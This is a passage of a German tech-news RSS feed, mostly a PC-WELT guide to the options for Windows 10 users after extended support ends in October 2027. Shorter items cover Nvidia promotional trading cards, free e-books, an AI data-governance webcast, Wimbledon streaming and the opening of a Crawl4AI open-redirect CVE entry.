<content:encoded><![CDATA[Die Stellantis Direktbank bietet Neukunden beim Tagesgeld ab sofort einen starken Aktionszins. Wer sein Geld flexibel parken will, erhält eine monatliche Zinsgutschrift, die Kontoführung ist kostenlos.]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows 10 weiter nutzen oder upgraden? Unsere Empfehlungen für wirklich jeden Nutzer]]></title>
<description><![CDATA[Am 12. Oktober 2027 beendet Microsoft für Privatanwender den erweiterten Support (den man als Extended Security Updates, ESU, bezeichnet) für Windows 10 (Version 22H2 Home, Professional, Pro Education oder Workstations Edition). Nur Unternehmenskunden bekommen gegen Bezahlung noch länger Sicherhe...]]></description>
<link>https://tsecurity.de/de/3664653/windows-tipps/windows-10-weiter-nutzen-oder-upgraden-unsere-empfehlungen-fuer-wirklich-jeden-nutzer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664653/windows-tipps/windows-10-weiter-nutzen-oder-upgraden-unsere-empfehlungen-fuer-wirklich-jeden-nutzer/</guid>
<pubDate>Mon, 13 Jul 2026 10:39:26 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Am <a href="https://www.pcwelt.de/article/3177497/windows-10-bekommt-ein-weiteres-jahr-lang-updates.html" target="_blank" rel="noreferrer noopener">12. Oktober 2027 beendet Microsoft für Privatanwender</a> den erweiterten Support (den man als <a href="https://www.microsoft.com/de-de/windows/extended-security-updates">Extended Security Updates, ESU</a>, bezeichnet) für Windows 10 (Version 22H2 Home, Professional, Pro Education oder Workstations Edition). Nur Unternehmenskunden bekommen gegen Bezahlung noch länger Sicherheits-Updates, und zwar bis 2028.</p>



<p>Das bedeutet: Nach dem 13. Oktober 2027 (nach der ursprünglichen Planung sollte bereits am 12.10.2026 Schluss sein, <a href="https://www.pcwelt.de/article/3177497/windows-10-bekommt-ein-weiteres-jahr-lang-updates.html" target="_blank" rel="noreferrer noopener">doch Microsoft verlängerte den Supportzeitraum für Windows 10 noch einmal) </a>erhalten Sie als Privatanwender für Ihren Windows-10-Rechner keine Sicherheits-Updates mehr. Neu entdeckte Sicherheitslücken in Windows 10 schließt Microsoft dann grundsätzlich nicht mehr, stattdessen bleiben diese offen und können von Angreifern ausgenutzt werden.</p>



<div class="ppl_wrap"><div class="top_head"><p class="pro_tag">PROMOTION</p><p><strong>Ihr Laptop bremst Sie aus? Dieses 2-in-1 lässt Sie produktiver arbeiten</strong></p></div><div class="ppl_row"><div class="pro_right promotion-item__image-outer-wrapper--small"><img decoding="async" class="promotion-item__image" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/HP-PPL-1-1.png" loading="lazy"></div><p class="ppl_text">
</p><p>Das HP OmniBook X Flip vereint Leistung und Flexibilität: Der AMD Ryzen AI Prozessor mit dedizierter NPU liefert bis zu 50 TOPS KI-Leistung. Das 14 Zoll 2K-Touchdisplay (16:9) überzeugt mit scharfen Bildern, das Scharnier ermöglicht vier Nutzungsmodi. Dank Schnellladefunktion ist der Akku in 30 Minuten zu 50 % geladen – ideal für lange Arbeitstage unterwegs.</p>
</div><div class="clear-both"></div><div class="more_btn"><a href="https://www.amazon.de/HP-OmniBook-dedizierte-1920x1200-Touchscreen/dp/B0DYKVHN9S/ref=sr_1_3?__mk_de_DE=%C3%85M%C3%85%C5%BD%C3%95%C3%91&amp;crid=17T5EFAKLON23&amp;dib=eyJ2IjoiMSJ9.Urord4CgBJNJbYPPq1-tmQ.BfmMNE5BiLmKOdYlUYty3j3H7aTBSwU3lNWwIw7fq0g&amp;dib_tag=se&amp;keywords=B0DYKVHN9S&amp;qid=1783079697&amp;sprefix=b0dykvhn9s%2Caps%2C164&amp;sr=8-3&amp;th=1&amp;tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" class="promotion-view-deal-link" rel="noopener">Erfahren Sie mehr über das HP OmniBook X Flip</a></div></div>



<p>Bei besonders schwerwiegenden Sicherheitslücken sind aber weiterhin Ausnahmen möglich. Denn Microsoft hatte auch schon bei älteren, eingestellten Versionen wie Windows XP und Windows 7 in seltenen Fällen noch Patches nach Supportende veröffentlicht. Doch darauf dürfen Sie sich nicht verlassen.</p>



<p>Sie stehen also spätestens am 13. Oktober nächsten Jahres vor der Entscheidung, ob Sie Ihren Windows-10-Rechner noch weiternutzen wollen. Diese Möglichkeiten haben Sie:</p>



<h2 class="wp-block-heading toc">Upgrade auf Windows 11: Sicher, gratis, empfehlenswert</h2>



<p><strong>Für diese Zielgruppe: </strong>Ihr alter PC/Laptop läuft stabil und ist für Ihre Bedürfnisse ausreichend schnell. Sie wollen möglichst kein Geld ausgeben und trotzdem relativ sicher vor Hackern und Viren sein. Zudem möchten Sie ein aktuelles Betriebssystem nutzen.</p>



<p>Der einfachste Weg besteht darin, dass Sie Ihr Windows 10 auf Windows 11 upgraden. <a href="https://support.microsoft.com/de-de/windows/upgrade-auf-windows-11-faq-fb6206a2-1a0f-448a-80f1-8668ee5b2bf9">Das ist für Sie kostenlos.</a> Einzige Hürde: <a href="https://www.pcwelt.de/article/1196400/windows-11-hardware-voraussetzungen-und-pruef-tool.html" target="_blank" rel="noreferrer noopener">Ihre Hardware muss für Windows 11 geeignet sein. </a>Das bedeutet: TPM 2.0, Secure Boot und kompatible Prozessoren ab der 8. Intel-Generation oder vergleichbare AMD-Modelle sind in Ihrem Rechner vorhanden.</p>



<p>Microsoft stellt die kostenlose <a href="https://go.microsoft.com/fwlink/?linkid=2169346" target="_blank" rel="noreferrer noopener">PC-Integritätsprüfungs-App</a> zur Verfügung, <a href="https://www.pcwelt.de/article/1198609/pc-health-check-ist-zurueck-microsoft-tool-prueft-ob-ihr-pc-fit-fuer-windows-11-ist.html" target="_blank" rel="noreferrer noopener">mit der Sie unter Windows 10 testen können,</a> ob die Aktualisierung möglich ist. Klicken Sie dazu nach dem Start des Tools auf „Jetzt überprüfen“.</p>



<p><strong>Tipp</strong>: Mit einigen Tricks können Sie Windows 11 auch auf Rechnern installieren, die für Windows 11 wegen veralteter Hardware nicht geeignet sind.</p>



<p><strong>Lösung:</strong> Wir erklären beide Upgrade-Wege – also für kompatible und für nichtkompatible Windows-10-Rechner – in dem Ratgeber “<a href="https://www.pcwelt.de/article//windows-10-update-auf-windows-11-24h2-so-gehts-kosten.html" target="_blank" rel="noreferrer noopener">Windows-10-Update auf Windows 11 24H2: Wie gehts? Was kostet es?</a>“.</p>



<p>Zur Installation auf Hardware, die eigentlich nicht für Windows 10 geeignet ist, können Sie zudem “<a href="https://www.pcwelt.de/article/1199049/windows-11-auf-jeder-hardware-installieren-so-gehts.html" target="_blank" rel="noreferrer noopener">Windows 11 auf jeder Hardware installieren – so geht´s</a>” lesen. Einen umfassenden Überblick zur Upgrade-Thematik bietet zudem unser Ratgeber “<a href="https://www.pcwelt.de/article/2915366/windows-10-nutzer-aufgepasst-das-muessen-sie-jetzt-unbedingt-tun.html" target="_blank" rel="noreferrer noopener">Windows-10-Nutzer aufgepasst: Das müssen Sie jetzt tun</a>“.</p>



<p><em>Übrigens: Sollten Sie Windows 11 Home im Einsatz haben, dann entgehen Ihnen die vielen Vorteile der Pro-Version, die wir Ihnen <a href="https://www.pcwelt.de/article/1203134/windows-11-unterschiede-zwischen-home-und-pro-version.html" target="_blank" rel="noreferrer noopener">hier vorstellen.</a> Im PC-WELT Software-Shop ist das Windows-11-Upgrade <a href="https://software.pcwelt.de/offer/windows_11_professional_upgrade/44487?x-source=rss" target="_blank" rel="noreferrer noopener">für 59,99 Euro statt 145 Euro</a> erhältlich.</em></p>



<h2 class="wp-block-heading toc">Neuen Windows-11-Rechner kaufen: Sicher, teuer, empfehlenswert</h2>



<p><strong>Für diese Zielgruppe: </strong>Ihr alter PC/Laptop hat bereits Macken, stürzt ab oder ist zu langsam. Sie benötigen ohnehin neue Hardware. </p>



<p>In diesem Fall ist der Kauf eines neuen Rechners oder Laptops ganz klar die beste Wahl für Sie. Damit machen Sie nichts falsch, allerdings müssen Sie dafür Geld in die Hand nehmen.</p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3003041/die-besten-mini-pcs-im-test-fur-buro-streaming-gaming-und-server.html" target="_blank" rel="noreferrer noopener">Die besten Mini-PCs im Test – für Büro, Streaming, Gaming und Server</a></li>



<li><a href="https://b2c-contenthub.com/wp-admin/post.php?post=3143670&amp;action=edit">Die besten Mini-PCs bis 800 Euro im Test: Viel Leistung auf kleinstem Raum</a></li>



<li><a href="https://www.pcwelt.de/article/2215385/die-besten-laptops-test.html" target="_blank" rel="noreferrer noopener">Die besten Notebooks aller Klassen im Vergleich</a></li>



<li><a href="https://www.pcwelt.de/article/1207305/das-sind-die-besten-pcs-fuer-buero-und-home-office.html" target="_blank" rel="noreferrer noopener">Das sind die besten PCs fürs Büro und Homeoffice</a></li>
</ul>



<h2 class="wp-block-heading toc">Wechsel zu Linux: Sicher, kostenlos, aufwendig</h2>



<p><strong>Für diese Zielgruppe: </strong>Ihr alter PC/Laptop läuft stabil und ist für Ihre Bedürfnisse ausreichend schnell. Sie wollen möglichst kein Geld ausgeben und trotzdem relativ sicher vor Hackern und Viren sein. Und Sie benötigen Windows nicht zwingend für bestimmte Anwendungen oder Spiele.</p>



<p>Sie müssen sich in das neue Betriebssystem allerdings einarbeiten und neue Programme kennenlernen. Das kostet Zeit und vermutlich auch etwas Nerven. Der Lohn der Mühe: Sie sind endlich frei von Microsoft. So, wie es unser Kollege in “<a href="https://www.pcwelt.de/article/2651727/endlich-frei-von-windows-nie-mehr-microsoft-dank-diesem-tool.html" target="_blank" rel="noreferrer noopener">Nie mehr Windows: Dieses Tool macht Sie jetzt Microsoft-frei</a>” beschreibt.</p>



<p><strong>Lösung</strong>: In “<a href="https://www.pcwelt.de/article/2521785/linux-wie-windows-welche-distribution-ist-am-aehnlichsten.html" target="_blank" rel="noreferrer noopener">Linux wie Windows: Welche Distribution ist am ähnlichsten?</a>” stellen wir Ihnen zudem geeignete Linux-Distributionen vor. Außerdem empfehlen wir Ihnen den Artikel “<a href="https://www.pcwelt.de/article/1178186/linux-anfaenger.html" target="_blank" rel="noreferrer noopener">Linux für Windows-Umsteiger: 10 Fragen &amp; Antworten</a>“.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure>



<h2 class="wp-block-heading toc">Wechsel zu einem Mac: Sicher, teuer, aufwendig</h2>



<p><strong>Für diese Zielgruppe: </strong>Ihr alter PC/Laptop hat bereits Macken, stürzt ab oder ist zu langsam. Sie benötigen ohnehin neue Hardware und sind bereit, viel Geld auszugeben und sich in ein neues Betriebssystem einzuarbeiten.</p>



<p><strong>Lösung</strong>: iMacs und Macbooks sind leistungsfähig und sicher, bekommen lange Updates und sind langlebig. Sie sind aber auch teuer, wobei das Macbook Neo jetzt einen vergleichsweise preiswerten Einstieg ermöglicht, siehe “<a href="https://www.pcwelt.de/article/3079069/das-macbook-neo-fuer-700-euro-ist-microsofts-schlimmster-albtraum.html" target="_blank" rel="noreferrer noopener">Das Macbook Neo für 700 Euro ist Microsofts schlimmster Albtraum</a>“.</p>


<span class="cta_btn_heading cta_btn_heading_"></span><div class="cta wp-block wp-block-button cta__btn_"><a class="cta__btn shopping-cart-icon-white link-6-button" href="https://amazon.de/dp/B0GR6PN6BH?tag=pcwelt.de-21&amp;ascsubtag=4-0-2286220-7-0-0-0-0&amp;ascsubtag=rss" target="_blank" rel="nofollow" data-vars-link-position="CTA Button" data-domain-name="amazon" data-subtag="4-0-2286220-7-0-0-0-0">Macbook Neo bei Amazon anschauen</a></div>


<h2 class="wp-block-heading toc">Wechsel zu einem Chromebook oder Googlebook: Sicher, günstig, bedingt empfehlenswert</h2>



<p><strong>Für diese Zielgruppe: </strong>Ihre alte Hardware läuft nicht mehr rund und Sie benötigen einen Laptop nur für wenig rechenintensive Aufgaben wie Surfen, Social Media, Streaming oder Office-Arbeiten. Sie wollen wenig Geld ausgeben und vergleichsweise sicher unterwegs sein. Sie arbeiten ohnehin immer schon durchgehend online.</p>



<p><strong>Lösung</strong>: In diesem Fall müssen Sie Ihren alten Windows-10-Laptop nicht zwingend durch ein teures Windows-11-Notebook oder ein Macbook ersetzen. Sondern können stattdessen auch ein vergleichsweise preiswertes Chromebook kaufen. Oder künftig ein Googlebook.</p>



<p>Chromebooks eignen sich als günstige Notebooks gut für alltägliche Aufgaben und Büroarbeiten. Dabei müssen Sie ganz auf das Ökosystem von Google vertrauen, im Gegenzug bekommen Sie <a href="https://www.pcwelt.de/article/2616240/darum-sind-chromebooks-sicherer-als-andere-laptops.html" target="_blank" rel="noreferrer noopener">viel Sicherheit vor Schadsoftware</a>. Hier finden Sie passende Geräte: <a href="https://www.pcwelt.de/article/2505538/die-besten-chromebooks-test.html" target="_blank" rel="noreferrer noopener">Die besten Chromebooks im Test.</a></p>



<p>Die Googlebooks sind die neueste Laptop-Familie von Google. Standardmäßig mit Gemini Intelligence und dem Magic Pointer an Bord. In “<a href="https://www.pcwelt.de/article/3138293/mit-den-googlebooks-will-google-den-laptop-markt-aufmischen-das-steckt-dahinter.html" target="_blank" rel="noreferrer noopener">Mit den Googlebooks will Google den Laptop-Markt aufmischen: Das steckt dahinter</a>” stellen wir Ihnen diese Geräte vor. Als Betriebssystem dient hier genauso wie bei den Chromebooks Chrome OS. Verkaufsstart soll im Herbst 2026 sein. Preise nennt Google noch keine, ebenso fehlen alle Informationen zur Hardware.</p>



<h2 class="wp-block-heading">Die letzte Chance</h2>



<p>Was aber tun, wenn man kein Geld für einen neuen Rechner hat, der alte PC aber das Upgrade auf Windows 11 wegen seiner schwachen Hardware nicht zulässt? Nun, dann bleibt theoretisch die Möglichkeit, Windows 10 weiter zu verwenden.</p>



<h2 class="wp-block-heading toc">Windows 10 nach Oktober 2027 weiternutzen: Nicht empfehlenswert</h2>



<p><strong>Für diese Zielgruppe: </strong>Ihr alter PC/Laptop läuft stabil und ist für Ihre Bedürfnisse ausreichend schnell. Sie wollen oder können kein Geld ausgeben und/oder benötigen weiter Windows 10 für bestimmte Anwendungen oder Spiele. Oder Sie wollen sich nicht mehr an ein neues Betriebssystem gewöhnen.</p>



<p><strong>Lösung: Beachten Sie die folgenden Hinweise</strong></p>



<p><strong>Virenscanner und Anwendungen aktuell halten</strong></p>



<p>Einen Windows-10-Rechner nach dem 12.10.2027 mit dem Internet zu verbinden, ist sehr gefährlich. Falls Sie das doch tun wollen und sich der Gefahr bewusst sind, dann halten Sie unbedingt den <a href="https://www.pcwelt.de/article/1203258/die-beste-antiviren-software-fuer-windows-10-fuers-buero.html">Virenscanner</a> und die Firewall auf dem PC immer aktuell. Aktualisieren Sie zudem immer alle Anwendungen auf dem Rechner, also beispielsweise die Browser.</p>



<p><strong>Defender bleibt aktuell</strong></p>



<p>Immerhin: Die vorhandenen Sicherheitsfunktionen des Betriebssystems bleiben aktiv, das gilt auch für den Malwareschutz. Sie veralten aber mit zunehmender Dauer. Der in Windows integrierte Microsoft Defender Antivirus wird aber weiterhin aktualisiert. Microsoft stellt hierfür die sogenannten „Security Intelligence Updates“ (die Datenbanken zur Erkennung neuer Viren und Malware) für alle Windows 10-Nutzer mindestens bis Oktober 2028 bereit. Dies garantiert einen grundlegenden und aktuellen Schutz vor Schadsoftware, auch wenn das Betriebssystem selbst nicht mehr gegen Schwachstellen im Code gepatcht wird.</p>



<p><strong>Meiden Sie unbekannte Webseiten und Downloads</strong></p>



<p>Die Firewall Ihres Routers schützt Ihren Windows-10-Rechner auch weiterhin. Gefährlich wird es aber, wenn Sie Webseiten im Browser aufrufen. Vermeiden Sie deshalb unbedingt den Besuch unbekannter Webseiten. Klicken Sie keine unbekannten Links an und seien Sie besonders vorsichtig bei Downloads – das gilt auch für Links und Dateianhänge in Mails. </p>



<p><strong>Kein Online-Banking</strong></p>



<p>Vermeiden Sie Einkäufe, Bezahlvorgänge und Online-Banking auf diesem Rechner. </p>



<p><strong>2FA besonders wichtig</strong></p>



<p>Schützen Sie alle Ihre Benutzerkonten durch die <a href="https://www.pcwelt.de/article/1206889/zwei-faktor-authentifizierung-alles-was-sie-wissen-muessen.html" target="_blank" rel="noreferrer noopener">Zweifaktorauthentifizierung</a> oder durch <a href="https://www.pcwelt.de/article/3128548/hoeren-sie-auf-passwoerter-zu-verwenden-ersetzen-sie-diese-stattdessen-jetzt-mit-passkeys.html" target="_blank" rel="noreferrer noopener">Passkeys</a>. Melden Sie sich bei all Ihren wichtigen Websites mit einem zusätzlichen Code (oder Schlüssel/Passwort) an, den Sie auf Ihrem Smartphone und nicht auf Ihrem jetzt anfälligen Windows-Computer speichern. Auf diese Weise können Malware oder Hacker Ihre Konten nicht über Ihren Computer übernehmen.</p>



<p><strong>Vom Internet trennen</strong></p>



<p>Falls Sie Ihren Windows-10-Rechner nach Oktober 2027 weiter nutzen wollen, um darauf beispielsweise ein fest installiertes Spiel zu spielen, für das Sie keine Internetverbindung benötigen, dann trennen Sie den Rechner am besten dauerhaft vom Internet. Und stecken Sie nur solche externen Datenträger wie USB-Sticks oder Festplatten an, die Sie mit einem aktuellen Virenscanner überprüft haben.</p>



<p>Weitere Ratschläge für die Weiternutzung von Windows 10 lesen Sie in “<a href="https://www.pcwelt.de/article/2620354/ab-heute-bekommt-windows-10-keine-sicherheits-updates-mehr-das-muessen-sie-jetzt-tun.html" target="_blank" rel="noreferrer noopener">Ab heute bekommt Windows 10 keine Sicherheits-Updates mehr – das müssen Sie jetzt tun</a>“. In diesem Zusammenhang sollten Sie auch die <a href="https://www.pcwelt.de/article/2872603/windows-10-support-ende-diese-datei-unbedingt-jetzt-runterladen.html" target="_blank" rel="noreferrer noopener">Windows-10-ISO-Datei herunterladen.</a></p>



<h2 class="wp-block-heading toc">Nutzen Sie Windows 10 in einer virtuellen Maschine: Sicher und gratis</h2>



<p>Falls Sie Windows 10 nur gelegentlich und nur für bestimmte Zwecke benötigen, können Sie das Betriebssystem auch in einer <a href="https://www.pcwelt.de/article/1179269/glossar-fachbegriffe-rund-um-virtuelle-pcs.html" target="_blank" rel="noreferrer noopener">virtuellen Maschine </a>installieren. Auf Ihrem Rechner läuft dann beispielsweise das aktuelle Windows 11 und Windows 10 starten Sie, wenn Sie es benötigen, als Gastsystem in der virtuellen Maschine.</p>



<h2 class="wp-block-heading toc">Updates für Windows 10 bis 2023: Sonderweg</h2>



<p>Eine Alternative, die Sie bereits jetzt nutzen können, ist die <a href="https://www.pcwelt.de/article/2431390/windows-10-bekommt-ab-oktober-2025-keine-updates-0patch-aendert-das.html" target="_blank" rel="noreferrer noopener">Sicherheitslösung 0Patch</a>. Dabei handelt es sich um ein Unternehmen, das Sicherheitsupdates für Windows 10 bis zum Jahr 2030 bereitstellt. Allerdings aktualisiert die cloudbasierte Software des Unternehmens nicht die Systemdateien von Windows 10, sondern aktiviert die Patches im Arbeitsspeicher des Rechners. Dadurch müssen diese bei jedem Start neu geladen werden. </p>



<p>Der Einstieg in die Software ist sogar kostenlos möglich. Wer umfassender geschützt sein will, <a href="https://0patch.com/pricing.html">kann die kostenpflichtige Version für 25 Euro pro Jahr zuzüglich Steuer buchen.</a></p>



<h2 class="wp-block-heading toc">Windows-10-Variante mit Updates bis 2032: Nicht legal</h2>



<p>Im Internet finden sich immer wieder Tipps, auf das Betriebssystem Windows 10 IoT Enterprise LTSC 2021 zu setzen. Dieses entspricht im Grunde genommen Windows 10 Enterprise mit allen Funktionen und erhält Updates bis 2032. <a href="https://learn.microsoft.com/de-de/windows/iot/iot-enterprise/commercialization/licensing" target="_blank" rel="noreferrer noopener">Lizenzrechtlich ist der Einsatz als Büro-PC aber nicht erlaubt</a>. </p>



<p>Technisch gesehen können Sie das Betriebssystem nach dem Kauf aber bis 2032 sicher einsetzen. Wie das geht, erklären wir in “<a href="https://www.pcwelt.de/article/2865406/windows-11-zu-windows-10-updowntool-anleitung-updates-bis-2032.html" target="_blank" rel="noreferrer noopener">Kostenlos von Windows 11 zu Windows 10 wechseln und Updates bis 2032 nutzen – so geht’s mit UpDownTool</a>“.</p>



<p><strong>Wichtig</strong>: Wie auch immer Ihre Entscheidung ausfällt, sollten Sie ein Backup Ihrer Daten auf dem alten Rechner machen. Mit <a href="https://software.pcwelt.de/offer/oo_diskimage_20_professional/43873?x-source=4-0-2620354-1-0-0-00001-0?x-source=rss" target="_blank" rel="noreferrer noopener">O&amp;O DiskImage</a> ist das kein Problem.</p>



<p></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Nvidia bringt neue Karten auf den Markt, die sich jeder leisten kann]]></title>
<description><![CDATA[Nvidia hat die „GeForce Trading Cards: Series 1“ vorgestellt, eine kostenlose Serie von “Sammelkarten”, die die Geschichte des Unternehmens im Bereich PC-Gaming würdigt. Die Serie umfasst 14 verschiedene Karten mit Motiven historischer Grafikkarten, klassischer Technik-Demos und bekannter Spiele,...]]></description>
<link>https://tsecurity.de/de/3664408/it-nachrichten/nvidia-bringt-neue-karten-auf-den-markt-die-sich-jeder-leisten-kann/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664408/it-nachrichten/nvidia-bringt-neue-karten-auf-den-markt-die-sich-jeder-leisten-kann/</guid>
<pubDate>Mon, 13 Jul 2026 08:32:17 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Nvidia hat die „<a href="https://www.nvidia.com/en-us/geforce/news/geforce-trading-cards-series-1-summer-of-rtx-giveaways/">GeForce Trading Cards: Series 1</a>“ vorgestellt, eine kostenlose Serie von “Sammelkarten”, die die Geschichte des Unternehmens im Bereich PC-Gaming würdigt. Die Serie umfasst 14 verschiedene Karten mit Motiven historischer Grafikkarten, klassischer Technik-Demos und bekannter Spiele, die die Marke GeForce im Laufe der Jahre geprägt haben.</p>



<p>Zu den Karten gehören unter anderem die NV1 aus dem Jahr 1995, die GeForce 256 sowie die GeForce 3, die GeForce 7800 GTX und die GeForce GTX 1080. Die Serie umfasst zudem Karten, die von Technik-Demos wie „Bubble“, „Chameleon“ und „Medusa“ sowie von Spielen wie „Unreal Tournament 2004“ und „Borderlands“ inspiriert sind.</p>



<p>Die Sammlerkarten werden im Rahmen der „Summer of RTX“-Kampagne von Nvidia kostenlos über die sozialen Medien des Unternehmens sowie auf Spielemessen und Veranstaltungen wie der Gamescom 2026 verteilt. Es handelt sich dabei also nicht um echte benutzbare Sammelkarten.</p>



<p>Laut Nvidia soll damit die Aufmerksamkeit auf Grafikkarten und Spiele gelenkt werden, die Generationen von PC-Spielern geprägt haben. Ein zusätzlicher Vorteil ist, dass die „GeForce Trading Cards: Series 1“ – obwohl die Speicherkrise die Preise für alle möglichen Grafikkarten in die Höhe getrieben hat – tatsächlich Nvidia-Karten sind, die sich jeder leisten kann. Zumindest solange, bis sie auf dem Gebrauchtmarkt auftauchen.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure>



<p><a href="https://www.pcwelt.de/article/3028440/nvidia-rtx-6000-release-2027-specs-geruechte-rubin.html" target="_blank" rel="noreferrer noopener"> Nvidia RTX-6000-Serie soll erst Ende 2027 erscheinen</a></p>



<p></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Diese 16 E-Books bekommt ihr kostenlos bei Amazon]]></title>
<description><![CDATA[Krimis aus dem Norden, Liebe aus aller Welt und finstere Helden aus der Dunkelheit – das sind die Themen der heutigen Gratis-E-Books aus dem Amazon-Angebot. Ihr bekommt die Bücher kostenlos und könnt sie nach dem Download behalten.]]></description>
<link>https://tsecurity.de/de/3664403/it-nachrichten/diese-16-e-books-bekommt-ihr-kostenlos-bei-amazon/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664403/it-nachrichten/diese-16-e-books-bekommt-ihr-kostenlos-bei-amazon/</guid>
<pubDate>Mon, 13 Jul 2026 08:32:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Krimis aus dem Norden, Liebe aus aller Welt und finstere Helden aus der Dunkelheit – das sind die Themen der heutigen Gratis-E-Books aus dem Amazon-Angebot. Ihr bekommt die Bücher kostenlos und könnt sie nach dem Download behalten.]]></content:encoded>
</item>
<item>
<title><![CDATA[KI-Sicherheit: Datenströme unter Kontrolle behalten]]></title>
<description><![CDATA[Der rasant fortschreitende Einzug von künstlicher Intelligenz verspricht enorme Effizienzgewinne, stellt IT-Sicherheitsverantwortliche jedoch vor massive Herausforderungen. Die unregulierte Nutzung von KI-Tools führt in vielen Betrieben zu gefährlicher Schatten-KI. Mitarbeitende laden oft sensibl...]]></description>
<link>https://tsecurity.de/de/3664268/it-security-nachrichten/ki-sicherheit-datenstroeme-unter-kontrolle-behalten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664268/it-security-nachrichten/ki-sicherheit-datenstroeme-unter-kontrolle-behalten/</guid>
<pubDate>Mon, 13 Jul 2026 07:22:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Der rasant fortschreitende Einzug von künstlicher Intelligenz verspricht enorme Effizienzgewinne, stellt IT-Sicherheitsverantwortliche jedoch vor massive Herausforderungen. Die unregulierte Nutzung von KI-Tools führt in vielen Betrieben zu gefährlicher Schatten-KI. Mitarbeitende laden oft sensible Unternehmensdaten oder geistiges Eigentum in öffentliche KI-Dienste hoch, wodurch diese unkontrolliert abfließen und im schlimmsten Fall in externe Trainingsdaten einfließen können.</p>



<p>Zudem fehlt in fragmentierten IT-Infrastrukturen oft der Überblick, welche Systeme auf welche Datenbestände zugreifen. Ohne eine lückenlose Klassifizierung riskieren Unternehmen Datenlecks und verstoßen schnell gegen Vorgaben wie den EU AI Act oder die DSGVO. Ein moderner Sicherheitsansatz erfordert daher eine Zero-Trust-Resilienz, bei der jedem Datenzugriff misstraut wird und nur verifizierte Quellen für KI-Anwendungen freigegeben werden.</p>



<p><strong>Drei Schritte zu einer sicheren Governance-Strategie</strong></p>



<p>Wie sich diese Kontrolle realisieren lässt, zeigt ein <a href="https://whitepaper.cio.de/resources/data-governance-im-ki-zeitalter/?utm_source=News&amp;utm_campaign=Veeam+LRWC+28-Juli&amp;utm_id=2088117" target="_blank" rel="noreferrer noopener">Computerwoche Webcast in Kooperation mit Veeam</a> am 28. Juli 2026 um 11:00 Uhr. Der Datensicherheitsspezialist Veeam bietet hierzu Ansätze, die weit über das klassische Backup hinausgehen und eine automatisierte Erkennung sowie Klassifizierung sensibler Daten in hybriden Umgebungen ermöglichen.</p>



<p>Im Webcast erfahren Teilnehmer, wie sie in drei Schritten eine tragfähige KI-Governance-Strategie aufbauen. Der Veeam-Experte Eduard Decker erklärt praxisnah, wie Unternehmen die Schatten-KI stoppen und ihre Resilienz stärken. Dr. Thomas Hafen übernimmt die Moderation der Live-Sendung.</p>



<h3 class="wp-block-heading">Webcast: Data Governance im KI-Zeitalter</h3>



<p><strong><a href="https://whitepaper.cio.de/resources/data-governance-im-ki-zeitalter/?utm_source=News&amp;utm_campaign=Veeam+LRWC+28-Juli&amp;utm_id=2088117" target="_blank" rel="noreferrer noopener">Jetzt kostenlos für den Webcast registrieren!</a></strong></p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Zverev vs. Sinner: So empfangt ihr das Wimbledon-Finale kostenlos im TV und Live-Stream]]></title>
<description><![CDATA[Am Sonntag, dem 12. Juli, steht das Wimbledon-Finale der Männer zwischen Alexander Zverev und Jannik Sinner an. So könnt ihr die Partie gratis im TV und Live-Stream mitverfolgen. 
																					Dieser Artikel wurde einsortiert unter 
																	Amazon,																	Live-Streams,		...]]></description>
<link>https://tsecurity.de/de/3663522/it-nachrichten/zverev-vs-sinner-so-empfangt-ihr-das-wimbledon-finale-kostenlos-im-tv-und-live-stream/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663522/it-nachrichten/zverev-vs-sinner-so-empfangt-ihr-das-wimbledon-finale-kostenlos-im-tv-und-live-stream/</guid>
<pubDate>Sun, 12 Jul 2026 17:32:33 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Am Sonntag, dem 12. Juli, steht das Wimbledon-Finale der Männer zwischen Alexander Zverev und Jannik Sinner an. So könnt ihr die Partie gratis im TV und Live-Stream mitverfolgen. 
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/hersteller/amazon.html">Amazon</a>,																	<a href="https://www.netzwelt.de/video/index.html">Live-Streams</a>,																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>,																	<a href="https://www.netzwelt.de/amazon-prime-video/index.html">Amazon Prime Video</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-56259 | Crawl4AI up to 0.8.7 Docker API /llm/job base_url/api_token redirect (EUVD-2026-43226)]]></title>
<description><![CDATA[A vulnerability classified as problematic was found in Crawl4AI up to 0.8.7. Affected is an unknown function of the file /llm/job of the component Docker API. Executing a manipulation of the argument base_url/api_token can lead to open redirect.

This vulnerability is registered as CVE-2026-56259...]]></description>
